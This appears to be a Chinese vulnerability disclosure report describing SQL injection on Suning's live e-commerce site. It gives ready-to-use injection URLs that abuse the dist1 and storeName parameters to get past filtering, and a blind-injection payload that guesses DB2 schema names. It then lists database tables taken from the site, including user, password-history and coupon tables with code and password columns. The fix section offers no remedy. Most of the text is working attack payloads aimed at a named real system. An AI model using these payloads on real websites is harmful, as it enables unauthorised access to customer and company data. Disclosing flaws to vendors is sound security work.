初始访问：
https://www.suning.com/emall/SNNetStoreView?storeId=11554&catalogId=10654&langId=-7&from=index&storeType=0&storeName=&reqProvince=&reqCity=
 
注入地址：
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/--
 
注入参数:dist1 和storeName ,结合，绕过SQL防注。
 
如盲注猜解：
https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/*
 
 
 
不知道用户名在不在了，盲注，猜解比较慢。下面是简单猜解的一些表什么的。
 
 
漏洞证明：盲注猜解:
'ADVISE_INDEX','ADVISE_WORKLOAD','DMUSERBHVR','GRUSERAUTH','ORDUSERS','USERDEMO','USERLOCK','USERPROF','USERPVCDEV','USERPWDHST','USERREG','USERS','USER_QA','XACTJOINUSER','XGPUSERREL','XIPUSERS','XMEMBERCARDUSERS','XROULETTEUSERCOUNT','XROULETTEUSERS','XSECKILLUSERREL','XSENDUSERS','XSENDUSERS_BAK','XSMARTUSERCOUNT','XTMPUSERS','XUSERGRADE','XUSERGRADECONF','XUSERPREFER','ZST_USER','ZST_USER_ROLE','USEROPTIONS','SYSUSERAUTH','SYSUSEROPTIONS'
 
表：XCOUPON （优惠券）
'CHARGEDATE','CODE','COUPONGROUP_ID','COUPONTMP_ID','COUPON_ID','COUPON_NO','COUPON_TYPE','CREATED_BY','CREATED_DATE','DELIVERDATE','DESCRIPTION','ENDDATE','FIELD1','FIELD2','FIELD3','LAST_UPDATED','LEVEL','MARKFORDELETE','NAME','NOTES','OPTCOUNTER','ORDERS_ID','PAR_VALUE','PASSWORD','REMAININGAMOUNT','SERIALNUMBER','SOURCE_ID','SOURCE_TYPE','STARTDATE','STATUS','UPDATED_BY','USERS_ID'
 
 
修复方案：
 
你懂得！